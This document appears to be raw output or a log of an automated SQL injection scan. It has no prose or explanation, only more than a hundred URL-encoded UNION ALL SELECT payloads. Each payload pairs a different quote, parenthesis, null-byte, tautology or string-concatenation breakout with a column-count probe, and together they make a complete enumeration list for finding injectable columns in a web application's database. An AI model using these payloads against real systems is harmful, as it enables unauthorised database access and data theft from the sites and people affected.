-4323%25%27%29%29%29%20UNION%20ALL%20SELECT%208038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038--%20 -6062%25%27%29%29%29%20UNION%20ALL%20SELECT%204204%2C4204%2C4204%2C4204%2C4204%2C4204%2C4204%2C4204%2C4204%2C4204%2C4204%2C4204%2C4204--%20 -9353%25%27%29%29%29%20UNION%20ALL%20SELECT%203499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499--%20 -4450%25%27%29%29%29%20UNION%20ALL%20SELECT%203792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792--%20 -9687%25%27%29%29%29%20UNION%20ALL%20SELECT%204979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979--%20 -7285%25%27%29%29%29%20UNION%20ALL%20SELECT%204141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141--%20 -1186%25%27%29%29%29%20UNION%20ALL%20SELECT%203716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716%2C3716--%20 -5652%25%27%29%29%29%20UNION%20ALL%20SELECT%207119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119--%20 -1717%25%27%29%29%29%20UNION%20ALL%20SELECT%203017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017--%20 -8281%25%27%20UNION%20ALL%20SELECT%207065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065--%20 -7674%25%27%20UNION%20ALL%20SELECT%208164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164--%20 -4425%25%27%20UNION%20ALL%20SELECT%201728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728--%20 -8539%25%27%20UNION%20ALL%20SELECT%205356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356--%20 -8560%25%27%20UNION%20ALL%20SELECT%201637%2C1637%2C1637%2C1637%2C1637%2C1637%2C1637%2C1637%2C1637%2C1637%2C1637%2C1637%2C1637%2C1637%2C1637--%20 -1559%25%27%20UNION%20ALL%20SELECT%207414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414--%20 -7867%25%27%20UNION%20ALL%20SELECT%202539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539%2C2539--%20 -7664%25%27%20UNION%20ALL%20SELECT%209132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132--%20 -6558%25%27%20UNION%20ALL%20SELECT%203753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753--%20 -8000%25%27%20UNION%20ALL%20SELECT%204035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035--%20 -2879%00%27%29%20UNION%20ALL%20SELECT%206461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461--%20 -9755%00%27%29%20UNION%20ALL%20SELECT%208869%2C8869%2C8869%2C8869%2C8869%2C8869%2C8869%2C8869%2C8869%2C8869%2C8869%2C8869--%20 -4027%00%27%29%20UNION%20ALL%20SELECT%209966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966--%20 -7781%00%27%29%20UNION%20ALL%20SELECT%207686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686--%20 -7601%00%27%29%20UNION%20ALL%20SELECT%203001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001--%20 -2890%00%27%29%20UNION%20ALL%20SELECT%201293%2C1293%2C1293%2C1293%2C1293%2C1293%2C1293%2C1293%2C1293%2C1293%2C1293%2C1293%2C1293%2C1293%2C1293%2C1293--%20 -5245%00%27%29%20UNION%20ALL%20SELECT%204533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533--%20 -2296%00%27%29%20UNION%20ALL%20SELECT%208395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395--%20 -2304%00%27%29%20UNION%20ALL%20SELECT%205436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436--%20 -9179%00%27%29%20UNION%20ALL%20SELECT%209042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042--%20 -4256%00%27%20UNION%20ALL%20SELECT%201977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977--%20 -1729%00%27%20UNION%20ALL%20SELECT%204769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769--%20 -7715%00%27%20UNION%20ALL%20SELECT%201838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838--%20 -7463%00%27%20UNION%20ALL%20SELECT%209492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492--%20 -1297%00%27%20UNION%20ALL%20SELECT%203801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801--%20 -9492%00%27%20UNION%20ALL%20SELECT%208864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864--%20 -8336%00%27%20UNION%20ALL%20SELECT%206118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118%2C6118--%20 -4741%00%27%20UNION%20ALL%20SELECT%207952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952%2C7952--%20 -9901%00%27%20UNION%20ALL%20SELECT%204108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108--%20 -1846%00%27%20UNION%20ALL%20SELECT%201423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423--%20 -4385%27%29%20WHERE%207131%3D7131%20UNION%20ALL%20SELECT%207131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131--%20 -1561%27%29%20WHERE%201507%3D1507%20UNION%20ALL%20SELECT%201507%2C1507%2C1507%2C1507%2C1507%2C1507%2C1507%2C1507%2C1507%2C1507%2C1507%2C1507--%20 -9963%27%29%20WHERE%203329%3D3329%20UNION%20ALL%20SELECT%203329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329--%20 -4305%27%29%20WHERE%202374%3D2374%20UNION%20ALL%20SELECT%202374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374--%20 -6929%27%29%20WHERE%207659%3D7659%20UNION%20ALL%20SELECT%207659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659--%20 -9891%27%29%20WHERE%201156%3D1156%20UNION%20ALL%20SELECT%201156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156%2C1156--%20 -8743%27%29%20WHERE%204437%3D4437%20UNION%20ALL%20SELECT%204437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437--%20 -5871%27%29%20WHERE%205702%3D5702%20UNION%20ALL%20SELECT%205702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702%2C5702--%20 -6327%27%29%20WHERE%206150%3D6150%20UNION%20ALL%20SELECT%206150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150--%20 -2634%27%29%20WHERE%204414%3D4414%20UNION%20ALL%20SELECT%204414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414%2C4414--%20 -9941%22%29%20WHERE%207442%3D7442%20UNION%20ALL%20SELECT%207442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442--%20 -9449%22%29%20WHERE%204976%3D4976%20UNION%20ALL%20SELECT%204976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976--%20 -9344%22%29%20WHERE%201508%3D1508%20UNION%20ALL%20SELECT%201508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508--%20 -9686%22%29%20WHERE%201556%3D1556%20UNION%20ALL%20SELECT%201556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556%2C1556--%20 -5864%22%29%20WHERE%203660%3D3660%20UNION%20ALL%20SELECT%203660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660--%20 -4391%22%29%20WHERE%209739%3D9739%20UNION%20ALL%20SELECT%209739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739--%20 -7054%22%29%20WHERE%203919%3D3919%20UNION%20ALL%20SELECT%203919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919--%20 -2552%22%29%20WHERE%204056%3D4056%20UNION%20ALL%20SELECT%204056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056--%20 -6979%22%29%20WHERE%207051%3D7051%20UNION%20ALL%20SELECT%207051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051%2C7051--%20 -5472%22%29%20WHERE%205286%3D5286%20UNION%20ALL%20SELECT%205286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286--%20 -7844%29%20WHERE%208574%3D8574%20UNION%20ALL%20SELECT%208574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574--%20 -6468%29%20WHERE%206536%3D6536%20UNION%20ALL%20SELECT%206536%2C6536%2C6536%2C6536%2C6536%2C6536%2C6536%2C6536%2C6536%2C6536%2C6536%2C6536--%20 -6175%29%20WHERE%207119%3D7119%20UNION%20ALL%20SELECT%207119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119--%20 -4439%29%20WHERE%206465%3D6465%20UNION%20ALL%20SELECT%206465%2C6465%2C6465%2C6465%2C6465%2C6465%2C6465%2C6465%2C6465%2C6465%2C6465%2C6465%2C6465%2C6465--%20 -4985%29%20WHERE%201064%3D1064%20UNION%20ALL%20SELECT%201064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064%2C1064--%20 -7730%29%20WHERE%203782%3D3782%20UNION%20ALL%20SELECT%203782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782--%20 -8597%29%20WHERE%201824%3D1824%20UNION%20ALL%20SELECT%201824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824%2C1824--%20 -4909%29%20WHERE%207424%3D7424%20UNION%20ALL%20SELECT%207424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424--%20 -2894%29%20WHERE%204685%3D4685%20UNION%20ALL%20SELECT%204685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685--%20 -3222%29%20WHERE%201327%3D1327%20UNION%20ALL%20SELECT%201327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327%2C1327--%20 -2733%27%20WHERE%208718%3D8718%20UNION%20ALL%20SELECT%208718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718--%20 -1667%27%20WHERE%203622%3D3622%20UNION%20ALL%20SELECT%203622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622--%20 -8159%27%20WHERE%206111%3D6111%20UNION%20ALL%20SELECT%206111%2C6111%2C6111%2C6111%2C6111%2C6111%2C6111%2C6111%2C6111%2C6111%2C6111%2C6111%2C6111--%20 -3927%27%20WHERE%201244%3D1244%20UNION%20ALL%20SELECT%201244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244--%20 -6915%27%20WHERE%207434%3D7434%20UNION%20ALL%20SELECT%207434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434--%20 -5999%27%20WHERE%207357%3D7357%20UNION%20ALL%20SELECT%207357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357--%20 -8484%27%20WHERE%205073%3D5073%20UNION%20ALL%20SELECT%205073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073--%20 -7928%27%20WHERE%206868%3D6868%20UNION%20ALL%20SELECT%206868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868--%20 -7675%27%20WHERE%205604%3D5604%20UNION%20ALL%20SELECT%205604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604--%20 -4474%27%20WHERE%202190%3D2190%20UNION%20ALL%20SELECT%202190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190%2C2190--%20 -1916%22%20WHERE%205062%3D5062%20UNION%20ALL%20SELECT%205062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062--%20 -2711%22%20WHERE%201395%3D1395%20UNION%20ALL%20SELECT%201395%2C1395%2C1395%2C1395%2C1395%2C1395%2C1395%2C1395%2C1395%2C1395%2C1395%2C1395--%20 -4920%22%20WHERE%201204%3D1204%20UNION%20ALL%20SELECT%201204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204--%20 -5258%22%20WHERE%208964%3D8964%20UNION%20ALL%20SELECT%208964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964--%20 -3161%22%20WHERE%203877%3D3877%20UNION%20ALL%20SELECT%203877%2C3877%2C3877%2C3877%2C3877%2C3877%2C3877%2C3877%2C3877%2C3877%2C3877%2C3877%2C3877%2C3877%2C3877--%20 -2666%22%20WHERE%206274%3D6274%20UNION%20ALL%20SELECT%206274%2C6274%2C6274%2C6274%2C6274%2C6274%2C6274%2C6274%2C6274%2C6274%2C6274%2C6274%2C6274%2C6274%2C6274%2C6274--%20 -2591%22%20WHERE%205262%3D5262%20UNION%20ALL%20SELECT%205262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262%2C5262--%20 -3475%22%20WHERE%201691%3D1691%20UNION%20ALL%20SELECT%201691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691--%20 -8462%22%20WHERE%204011%3D4011%20UNION%20ALL%20SELECT%204011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011--%20 -7064%22%20WHERE%202416%3D2416%20UNION%20ALL%20SELECT%202416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416--%20 -3014%20WHERE%204126%3D4126%20UNION%20ALL%20SELECT%204126%2C4126%2C4126%2C4126%2C4126%2C4126%2C4126%2C4126%2C4126%2C4126%2C4126--%20 -9058%20WHERE%202008%3D2008%20UNION%20ALL%20SELECT%202008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008--%20 -7173%20WHERE%205789%3D5789%20UNION%20ALL%20SELECT%205789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789--%20 -4656%20WHERE%205608%3D5608%20UNION%20ALL%20SELECT%205608%2C5608%2C5608%2C5608%2C5608%2C5608%2C5608%2C5608%2C5608%2C5608%2C5608%2C5608%2C5608%2C5608--%20 -3351%20WHERE%207254%3D7254%20UNION%20ALL%20SELECT%207254%2C7254%2C7254%2C7254%2C7254%2C7254%2C7254%2C7254%2C7254%2C7254%2C7254%2C7254%2C7254%2C7254%2C7254--%20 -6703%20WHERE%208096%3D8096%20UNION%20ALL%20SELECT%208096%2C8096%2C8096%2C8096%2C8096%2C8096%2C8096%2C8096%2C8096%2C8096%2C8096%2C8096%2C8096%2C8096%2C8096%2C8096--%20 -1238%20WHERE%203117%3D3117%20UNION%20ALL%20SELECT%203117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117--%20 -2102%20WHERE%206755%3D6755%20UNION%20ALL%20SELECT%206755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755--%20 -5516%20WHERE%203975%3D3975%20UNION%20ALL%20SELECT%203975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975--%20 -9944%20WHERE%204199%3D4199%20UNION%20ALL%20SELECT%204199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199%2C4199--%20 -4924%27%7C%7C%28SELECT%20%27UiXz%27%20FROM%20DUAL%20WHERE%208318%3D8318%20UNION%20ALL%20SELECT%208318%2C8318%2C8318%2C8318%2C8318%2C8318%2C8318%2C8318%2C8318%2C8318%2C8318--%20 -2203%27%7C%7C%28SELECT%20%27KsOt%27%20FROM%20DUAL%20WHERE%204812%3D4812%20UNION%20ALL%20SELECT%204812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812--%20 -4971%27%7C%7C%28SELECT%20%27KZvj%27%20FROM%20DUAL%20WHERE%201571%3D1571%20UNION%20ALL%20SELECT%201571%2C1571%2C1571%2C1571%2C1571%2C1571%2C1571%2C1571%2C1571%2C1571%2C1571%2C1571%2C1571--%20 -3712%27%7C%7C%28SELECT%20%27hgzi%27%20FROM%20DUAL%20WHERE%206421%3D6421%20UNION%20ALL%20SELECT%206421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421--%20 -2882%27%7C%7C%28SELECT%20%27lTff%27%20FROM%20DUAL%20WHERE%206652%3D6652%20UNION%20ALL%20SELECT%206652%2C6652%2C6652%2C6652%2C6652%2C6652%2C6652%2C6652%2C6652%2C6652%2C6652%2C6652%2C6652%2C6652%2C6652--%20 -1024%27%7C%7C%28SELECT%20%27PwKX%27%20FROM%20DUAL%20WHERE%202993%3D2993%20UNION%20ALL%20SELECT%202993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993--%20 -9751%27%7C%7C%28SELECT%20%27Jbxo%27%20FROM%20DUAL%20WHERE%207787%3D7787%20UNION%20ALL%20SELECT%207787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787--%20 -5880%27%7C%7C%28SELECT%20%27FJnz%27%20FROM%20DUAL%20WHERE%208827%3D8827%20UNION%20ALL%20SELECT%208827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827%2C8827--%20 -6137%27%7C%7C%28SELECT%20%27jvmF%27%20FROM%20DUAL%20WHERE%202717%3D2717%20UNION%20ALL%20SELECT%202717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717--%20 -3495%27%7C%7C%28SELECT%20%27gbiK%27%20FROM%20DUAL%20WHERE%204462%3D4462%20UNION%20ALL%20SELECT%204462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462--%20 -9837%27%7C%7C%28SELECT%20%27BcYB%27%20WHERE%203565%3D3565%20UNION%20ALL%20SELECT%203565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565--%20 -9141%27%7C%7C%28SELECT%20%27fcKv%27%20WHERE%207152%3D7152%20UNION%20ALL%20SELECT%207152%2C7152%2C7152%2C7152%2C7152%2C7152%2C7152%2C7152%2C7152%2C7152%2C7152%2C7152--%20 -6308%27%7C%7C%28SELECT%20%27yiYB%27%20WHERE%204291%3D4291%20UNION%20ALL%20SELECT%204291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291--%20 -3061%27%7C%7C%28SELECT%20%27oaSW%27%20WHERE%201682%3D1682%20UNION%20ALL%20SELECT%201682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682--%20 -7231%27%7C%7C%28SELECT%20%27Iocv%27%20WHERE%208351%3D8351%20UNION%20ALL%20SELECT%208351%2C8351%2C8351%2C8351%2C8351%2C8351%2C8351%2C8351%2C8351%2C8351%2C8351%2C8351%2C8351%2C8351%2C8351--%20 -9252%27%7C%7C%28SELECT%20%27KPnX%27%20WHERE%201040%3D1040%20UNION%20ALL%20SELECT%201040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040--%20 -9066%27%7C%7C%28SELECT%20%27SnNA%27%20WHERE%209132%3D9132%20UNION%20ALL%20SELECT%209132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132--%20 -4928%27%7C%7C%28SELECT%20%27ymfp%27%20WHERE%206674%3D6674%20UNION%20ALL%20SELECT%206674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674%2C6674--%20 -2916%27%7C%7C%28SELECT%20%27roqo%27%20WHERE%204358%3D4358%20UNION%20ALL%20SELECT%204358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358--%20 -1527%27%7C%7C%28SELECT%20%27VOaW%27%20WHERE%208258%3D8258%20UNION%20ALL%20SELECT%208258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258--%20 -4834%27%2B%28SELECT%20JcLR%20WHERE%209214%3D9214%20UNION%20ALL%20SELECT%209214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214--%20 -5164%27%2B%28SELECT%20oucA%20WHERE%204609%3D4609%20UNION%20ALL%20SELECT%204609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609--%20 -8222%27%2B%28SELECT%20srON%20WHERE%205903%3D5903%20UNION%20ALL%20SELECT%205903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903--%20 -2218%27%2B%28SELECT%20KaUQ%20WHERE%201916%3D1916%20UNION%20ALL%20SELECT%201916%2C1916%2C1916%2C1916%2C1916%2C1916%2C1916%2C1916%2C1916%2C1916%2C1916%2C1916%2C1916%2C1916--%20 -1395%27%2B%28SELECT%20NXvW%20WHERE%201687%3D1687%20UNION%20ALL%20SELECT%201687%2C1687%2C1687%2C1687%2C1687%2C1687%2C1687%2C1687%2C1687%2C1687%2C1687%2C1687%2C1687%2C1687%2C1687--%20 -8077%27%2B%28SELECT%20ovvO%20WHERE%207611%3D7611%20UNION%20ALL%20SELECT%207611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611--%20 -4972%27%2B%28SELECT%20tAFU%20WHERE%206459%3D6459%20UNION%20ALL%20SELECT%206459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459--%20 -3349%27%2B%28SELECT%20KgiC%20WHERE%205698%3D5698%20UNION%20ALL%20SELECT%205698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698--%20 -1753%27%2B%28SELECT%20zGgS%20WHERE%207904%3D7904%20UNION%20ALL%20SELECT%207904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904%2C7904--%20 